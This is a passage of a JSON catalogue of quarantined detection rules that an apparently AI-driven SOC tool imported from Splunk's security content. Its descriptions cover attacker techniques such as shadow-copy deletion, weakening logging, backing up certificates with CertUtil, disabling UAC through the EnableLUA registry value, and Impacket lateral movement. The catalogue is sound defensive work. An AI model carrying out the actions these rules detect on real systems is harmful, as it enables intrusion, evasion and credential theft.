By lowering logging verbosity, attackers can operate with reduced visibility to security teams.\nThe detection monitors for logging configuration commands (message ID 111008 or 111010) that modify logging destinations (asdm, console, history, mail, monitor, trap) without setting them to higher severity levels (5-notifications, 6-informational, 7-debugging), which may indicate an attempt to reduce logging verbosity.\nInvestigate unauthorized logging configuration changes that reduce verbosity, especially changes performed by non-administrative accounts, during unusual hours, or without corresponding change management approval.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-asa-logging-filters-configuration-tampering.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b87b48a8-6d1a-4280-9cf1-16a950dbf901", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/cisco_asa___logging_filters_configuration_tampering.yml" } }, { "id": "splunk-security-content-b89919ed-ee5f-492c-b139-95dbb162039e", "type": "detection", "name": "Deleting Shadow Copies", "description": "The following analytic detects the deletion of shadow copies using the vssadmin.exe or wmic.exe utilities. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line arguments. 
This activity is significant because deleting shadow copies is a common tactic used by attackers to prevent recovery and hide their tracks. If confirmed malicious, this action could hinder incident response efforts and allow attackers to maintain persistence and cover their activities, making it crucial for security teams to investigate promptly.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1490" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/deleting-shadow-copies.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b89919ed-ee5f-492c-b139-95dbb162039e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/deleting_shadow_copies.yml" } }, { "id": "splunk-security-content-b89919ed-fe5f-492c-b139-95dbb162039e", "type": "detection", "name": "Detect Use of cmd exe to Launch Script Interpreters", "description": "The following detects the execution of cscript.exe or wscript.exe processes spawned by cmd.exe, leveraging Endpoint Detection and Response (EDR) telemetry mapped to the Endpoint data model, with additional contextual filtering to improve fidelity and reduce false positives.\nIt focuses on executions originating from user-writable directories such as Users, AppData, Temp, and Downloads, which are commonly abused by attackers to stage and execute malicious scripts, while excluding trusted system paths like C:\\Windows\\System32\\ and C:\\Program Files\\ that are typically associated with legitimate activity.\nThe detection also filters out service 
accounts (e.g., accounts ending with $ or known naming conventions) to minimize noise from automated processes and incorporates command-line context to better assess script execution patterns and identify potentially suspicious behavior.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-use-of-cmd-exe-to-launch-script-interpreters.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b89919ed-fe5f-492c-b139-95dbb162039e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/detect_use_of_cmd_exe_to_launch_script_interpreters.yml" } }, { "id": "splunk-security-content-b8bccfbf-6ac2-40f2-83b6-e72b7efaa7d4", "type": "detection", "name": "Crowdstrike Admin With Duplicate Password", "description": "The following analytic detects CrowdStrike alerts for admin accounts with duplicate password risk, identifying instances where administrative users share the same password. This practice significantly increases the risk of unauthorized access and potential breaches. 
Addressing these alerts promptly is crucial for maintaining strong security protocols, ensuring each admin account uses a unique, secure password to protect critical systems and data.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/crowdstrike-admin-with-duplicate-password.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b8bccfbf-6ac2-40f2-83b6-e72b7efaa7d4", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/crowdstrike_admin_with_duplicate_password.yml" } }, { "id": "splunk-security-content-b8cbef2c-2cc3-4550-b0fc-9715b7852df9", "type": "detection", "name": "Windows Privileged Group Modification", "description": "This analytic detects modifications to privileged groups in Active Directory, including addition, creation, deletion, and changes to various types of groups such as local, global, universal, and LDAP query groups.\nIt specifically monitors for changes to high-privilege groups like \"Administrators\", \"Domain Admins\", \"Enterprise Admins\", and \"ESX Admins\", among others.\nThis detection is particularly relevant in the context of potential exploitation of vulnerabilities like the VMware ESXi Active Directory Integration Authentication Bypass (CVE-2024-37085), where attackers may attempt to manipulate privileged groups to gain unauthorized access to systems.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", 
"mitre_techniques": [ "T1136.001", "T1136.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-privileged-group-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b8cbef2c-2cc3-4550-b0fc-9715b7852df9", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_privileged_group_modification.yml" } }, { "id": "splunk-security-content-b8f7ed6b-0556-4c84-bffd-839c262b0278", "type": "detection", "name": "Windows Access Token Winlogon Duplicate Handle In Uncommon Path", "description": "The following analytic detects a process attempting to duplicate the handle of winlogon.exe from an uncommon or public source path. This is identified using Sysmon EventCode 10, focusing on processes targeting winlogon.exe with specific access rights and excluding common system paths. This activity is significant because it may indicate an adversary trying to escalate privileges by leveraging the high-privilege tokens associated with winlogon.exe. 
If confirmed malicious, this could allow the attacker to gain elevated access, potentially leading to full system compromise and persistent control over the affected host.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1134.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-access-token-winlogon-duplicate-handle-in-uncommon-path.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b8f7ed6b-0556-4c84-bffd-839c262b0278", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_access_token_winlogon_duplicate_handle_in_uncommon_path.yml" } }, { "id": "splunk-security-content-b8f9947e-065a-11ec-aafb-acde48001122", "type": "detection", "name": "Get DomainPolicy with Powershell", "description": "The following analytic detects the execution of `powershell.exe` running the `Get-DomainPolicy` cmdlet, which is used to retrieve password policies in a Windows domain. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions. This activity is significant as it indicates potential reconnaissance efforts by adversaries to gather domain policy information, which is crucial for planning further attacks. 
If confirmed malicious, this could lead to unauthorized access to sensitive domain configurations, aiding in privilege escalation and lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1201" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/get-domainpolicy-with-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b8f9947e-065a-11ec-aafb-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/get_domainpolicy_with_powershell.yml" } }, { "id": "splunk-security-content-b9bc5513-6fc1-4821-85a3-e1d81e451c83", "type": "detection", "name": "GCP Multi-Factor Authentication Disabled", "description": "The following analytic detects an attempt to disable multi-factor authentication (MFA) for a Google Cloud Platform (GCP) user. It leverages Google Workspace Admin log events, specifically the `UNENROLL_USER_FROM_STRONG_AUTH` command. This activity is significant because disabling MFA can allow an adversary to maintain persistence within the environment using a compromised account without raising suspicion. 
If confirmed malicious, this action could enable attackers to bypass additional security layers, potentially leading to unauthorized access, data exfiltration, or further exploitation of the compromised account.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1556.006", "T1586.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/gcp-multi-factor-authentication-disabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b9bc5513-6fc1-4821-85a3-e1d81e451c83", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/gcp_multi_factor_authentication_disabled.yml" } }, { "id": "splunk-security-content-b9fb8d97-dbc9-4a09-804c-ff0e3862bb2d", "type": "detection", "name": "Windows Rundll32 Apply User Settings Changes", "description": "The following analytic detects the execution of rundll32 with a call to the user32 DLL, specifically the UpdatePerUserSystemParameters function.\nThis function is responsible for updating system parameters, such as desktop backgrounds, display settings, and visual themes.\nIt leverages data from Endpoint Detection and Response (EDR) agents, focusing on command-line executions.\nThis activity can be significant as it is an uncommon way to apply settings. 
It was also observed as part of Rhysida Ransomware activity.\nIf confirmed malicious, this could allow an attacker to disguise activities or make unauthorized system changes, potentially leading to persistent unauthorized access.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.011" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-rundll32-apply-user-settings-changes.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b9fb8d97-dbc9-4a09-804c-ff0e3862bb2d", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_rundll32_apply_user_settings_changes.yml" } }, { "id": "splunk-security-content-ba24cda8-4716-11ec-8009-3e22fbd008af", "type": "detection", "name": "Remote Process Instantiation via WinRM and PowerShell", "description": "The following analytic detects the execution of `powershell.exe` with arguments used to start a process on a remote endpoint via the WinRM protocol, specifically targeting the `Invoke-Command` cmdlet. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on command-line executions and process telemetry. This activity is significant as it may indicate lateral movement or remote code execution attempts by adversaries. 
If confirmed malicious, this could allow attackers to execute arbitrary code on remote systems, potentially leading to further compromise and lateral spread within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.006" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/remote-process-instantiation-via-winrm-and-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ba24cda8-4716-11ec-8009-3e22fbd008af", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/remote_process_instantiation_via_winrm_and_powershell.yml" } }, { "id": "splunk-security-content-ba570b3a-d356-11eb-8358-acde48001122", "type": "detection", "name": "Recursive Delete of Directory In Batch CMD", "description": "The following analytic detects the execution of a batch command designed to recursively delete files or directories, a technique often used by ransomware like Reddot to delete files in the recycle bin and prevent recovery. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on command-line executions that include specific flags for recursive and quiet deletions. This activity is significant as it indicates potential ransomware behavior aimed at data destruction. 
If confirmed malicious, it could lead to significant data loss and hinder recovery efforts, severely impacting business operations.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1070.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/recursive-delete-of-directory-in-batch-cmd.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ba570b3a-d356-11eb-8358-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/recursive_delete_of_directory_in_batch_cmd.yml" } }, { "id": "splunk-security-content-ba6e7f4d-a85e-4a14-8e7d-41f4b82e3c9a", "type": "detection", "name": "Windows Cisco Secure Endpoint Uninstall Immunet Service Via Sfc", "description": "The following analytic detects the use of the sfc.exe utility with the \"-u\" parameter, which is part of the Cisco Secure Endpoint installation. The \"-u\" flag allows the uninstallation of Cisco Secure Endpoint components. This detection leverages endpoint telemetry to monitor command-line executions that include the \"-u\" parameter. The use of this flag is significant as it could indicate an attempt to disable or remove endpoint protection, potentially leaving the system vulnerable to further exploitation. 
If identified as malicious, this action may be part of a broader effort to disable security mechanisms and avoid detection.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-cisco-secure-endpoint-uninstall-immunet-service-via-sfc.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ba6e7f4d-a85e-4a14-8e7d-41f4b82e3c9a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_cisco_secure_endpoint_uninstall_immunet_service_via_sfc.yml" } }, { "id": "splunk-security-content-ba9e1954-4c04-11ec-8b74-3e22fbd008af", "type": "detection", "name": "Services LOLBAS Execution Process Spawn", "description": "The following analytic identifies `services.exe` spawning a LOLBAS (Living Off the Land Binaries and Scripts) execution process. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process creation events where `services.exe` is the parent process. This activity is significant because adversaries often abuse the Service Control Manager to execute malicious code via native Windows binaries, facilitating lateral movement. 
If confirmed malicious, this behavior could allow attackers to execute arbitrary code, escalate privileges, or maintain persistence within the environment, posing a severe security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1543.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/services-lolbas-execution-process-spawn.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ba9e1954-4c04-11ec-8b74-3e22fbd008af", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/services_lolbas_execution_process_spawn.yml" } }, { "id": "splunk-security-content-baa80bc8-7c9c-4395-b458-b69feb92830a", "type": "detection", "name": "Windows Suspicious React or Next.js Child Process", "description": "This analytic detects Windows processes such as cmd.exe, PowerShell, and common Windows LOLBINs being spawned by React or Next.js application servers.\nIn the context of CVE-2025-55182 / React2Shell / CVE-2025-66478 for Next.js, successful exploitation can lead to arbitrary JavaScript execution on the server, which in turn is used to invoke Node's child_process APIs (for example child_process.execSync) to run OS-level commands.\nThis detection focuses on suspicious child processes where a Next/React server process spawns an uncommon process.\nSuch activity might be a strong indicator of exploitation of the aforementioned vulnerability.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", 
"mitre_techniques": [ "T1190", "T1059.003", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-suspicious-react-or-next-js-child-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "baa80bc8-7c9c-4395-b458-b69feb92830a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_suspicious_react_or_next_js_child_process.yml" } }, { "id": "splunk-security-content-babd8d10-d073-11ea-87d0-0242ac130003", "type": "detection", "name": "Detect Windows DNS SIGRed via Splunk Stream", "description": "The following analytic detects attempts to exploit the SIGRed vulnerability (CVE-2020-1350) in Windows DNS servers. It leverages Splunk Stream DNS and TCP data to identify DNS SIG and KEY records, as well as TCP payloads exceeding 65KB. This activity is significant because SIGRed is a critical wormable vulnerability that allows remote code execution. If confirmed malicious, an attacker could gain unauthorized access, execute arbitrary code, and potentially disrupt services, leading to severe data breaches and infrastructure compromise. 
Immediate investigation and remediation are crucial to mitigate these risks.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1203" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-windows-dns-sigred-via-splunk-stream.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "babd8d10-d073-11ea-87d0-0242ac130003", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/detect_windows_dns_sigred_via_splunk_stream.yml" } }, { "id": "splunk-security-content-bac85b56-0b65-4ce5-aad5-d94880df0967", "type": "detection", "name": "Windows Steal Authentication Certificates CertUtil Backup", "description": "The following analytic detects CertUtil.exe performing a backup of the Certificate Store. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on specific command-line executions involving CertUtil with backup parameters. This activity is significant because it may indicate an attempt to steal authentication certificates, which are critical for secure communications. 
If confirmed malicious, an attacker could use the stolen certificates to impersonate users, decrypt sensitive data, or gain unauthorized access to systems, leading to severe security breaches.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1649" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-steal-authentication-certificates-certutil-backup.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "bac85b56-0b65-4ce5-aad5-d94880df0967", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_steal_authentication_certificates_certutil_backup.yml" } }, { "id": "splunk-security-content-bb093c30-d860-4858-a56e-cd0895d5b49c", "type": "detection", "name": "Azure AD User Consent Denied for OAuth Application", "description": "The following analytic identifies instances where a user has denied consent to an OAuth application seeking permissions within the Azure AD environment. This detection leverages Azure AD's audit logs, specifically focusing on user consent actions with error code 65004. Monitoring denied consent actions is significant as it can indicate users recognizing potentially suspicious or untrusted applications. If confirmed malicious, this activity could suggest attempts by unauthorized applications to gain access, potentially leading to data breaches or unauthorized actions within the environment. 
Understanding these denials helps refine security policies and enhance user awareness.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1528" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/azure-ad-user-consent-denied-for-oauth-application.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "bb093c30-d860-4858-a56e-cd0895d5b49c", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/azure_ad_user_consent_denied_for_oauth_application.yml" } }, { "id": "splunk-security-content-bb1481fd-23c0-4195-b6a0-94d746c9637c", "type": "detection", "name": "Crowdstrike Admin Weak Password Policy", "description": "The following analytic detects CrowdStrike alerts for admin weak password policy violations, identifying instances where administrative passwords do not meet security standards. These alerts highlight significant vulnerabilities that could be exploited by attackers to gain unauthorized access. 
Promptly addressing these alerts is crucial for maintaining robust security and protecting critical systems and data from potential threats.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/crowdstrike-admin-weak-password-policy.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "bb1481fd-23c0-4195-b6a0-94d746c9637c", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/crowdstrike_admin_weak_password_policy.yml" } }, { "id": "splunk-security-content-bb1c2c30-107a-4e56-a4b9-1f7022867bfe", "type": "detection", "name": "F5 BIG-IP iControl REST Vulnerability CVE-2022-1388", "description": "The following analytic detects attempts to exploit the F5 BIG-IP iControl REST API vulnerability (CVE-2022-1388) for unauthenticated remote code execution.\nIt identifies suspicious URI paths and POST HTTP methods, along with specific request headers containing potential commands in the `utilcmdargs` field and a random base64 encoded value in the `X-F5-Auth-Token` field.\nThis activity is significant as it targets a critical vulnerability that can allow attackers to execute arbitrary commands on the affected system.\nIf confirmed malicious, this could lead to full system compromise and unauthorized access to sensitive data.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190", "T1133" ], "log_source": null, "playbook": null, 
"verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/f5-big-ip-icontrol-rest-vulnerability-cve-2022-1388.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "bb1c2c30-107a-4e56-a4b9-1f7022867bfe", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/f5_big_ip_icontrol_rest_vulnerability_cve_2022_1388.yml" } }, { "id": "splunk-security-content-bb27cbce-d4de-432c-932f-2e206e9130fb", "type": "detection", "name": "Okta New Device Enrolled on Account", "description": "The following analytic identifies when a new device is enrolled on an Okta account. It uses OktaIm2 logs ingested via the Splunk Add-on for Okta Identity Cloud to detect the creation of new device enrollments. This activity is significant as it may indicate a legitimate user setting up a new device or an adversary adding a device to maintain unauthorized access. If confirmed malicious, this could lead to potential account takeover, unauthorized access, and persistent control over the compromised Okta account. 
Monitoring this behavior is crucial for detecting and mitigating unauthorized access attempts.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098.005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/okta-new-device-enrolled-on-account.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "bb27cbce-d4de-432c-932f-2e206e9130fb", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/okta_new_device_enrolled_on_account.yml" } }, { "id": "splunk-security-content-bb37061e-af1f-11eb-a159-acde48001122", "type": "detection", "name": "Schtasks Run Task On Demand", "description": "The following analytic detects the execution of a Windows Scheduled Task on demand via the shell or command line. It leverages process-related data, including process name, parent process, and command-line executions, sourced from endpoint logs. The detection focuses on 'schtasks.exe' with an associated 'run' command. This activity is significant as adversaries often use it to force the execution of their created Scheduled Tasks for persistent access or lateral movement within a compromised machine. 
If confirmed malicious, this could allow attackers to maintain persistence or move laterally within the network, potentially leading to further compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1053" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/schtasks-run-task-on-demand.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "bb37061e-af1f-11eb-a159-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/schtasks_run_task_on_demand.yml" } }, { "id": "splunk-security-content-bb3c1bac-6bdf-4aa0-8dc9-068b8b712a76", "type": "detection", "name": "Impacket Lateral Movement smbexec CommandLine Parameters", "description": "The following analytic identifies suspicious command-line parameters associated with the use of Impacket's smbexec.py for lateral movement. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on specific command-line patterns indicative of Impacket tool usage. This activity is significant as both Red Teams and adversaries use Impacket for remote code execution and lateral movement. 
If confirmed malicious, this activity could allow attackers to execute commands on remote endpoints, potentially leading to unauthorized access, data exfiltration, or further compromise of the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.002", "T1021.003", "T1047", "T1543.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/impacket-lateral-movement-smbexec-commandline-parameters.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "bb3c1bac-6bdf-4aa0-8dc9-068b8b712a76", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/impacket_lateral_movement_smbexec_commandline_parameters.yml" } }, { "id": "splunk-security-content-bb4f3090-7ae4-11ec-897f-acde48001122", "type": "detection", "name": "Windows NirSoft AdvancedRun", "description": "The following analytic detects the execution of AdvancedRun.exe, a tool with capabilities similar to remote administration programs like PsExec. It identifies the process by its name or original file name and flags common command-line arguments. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process and command-line telemetry. Monitoring this activity is crucial as AdvancedRun can be used for remote code execution and configuration-based automation. 
If malicious, this could allow attackers to execute arbitrary commands, escalate privileges, or maintain persistence within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1588.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-nirsoft-advancedrun.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "bb4f3090-7ae4-11ec-897f-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_nirsoft_advancedrun.yml" } }, { "id": "splunk-security-content-bbc644bc-37df-4e1a-9c88-ec9a53e2038c", "type": "detection", "name": "Disabling Remote User Account Control", "description": "The following analytic identifies modifications to the registry key that controls the enforcement of Windows User Account Control (UAC). It detects changes to the registry path `HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\EnableLUA` where the value is set to `0x00000000`. This activity is significant because disabling UAC can allow unauthorized changes to the system without user consent, potentially leading to privilege escalation. 
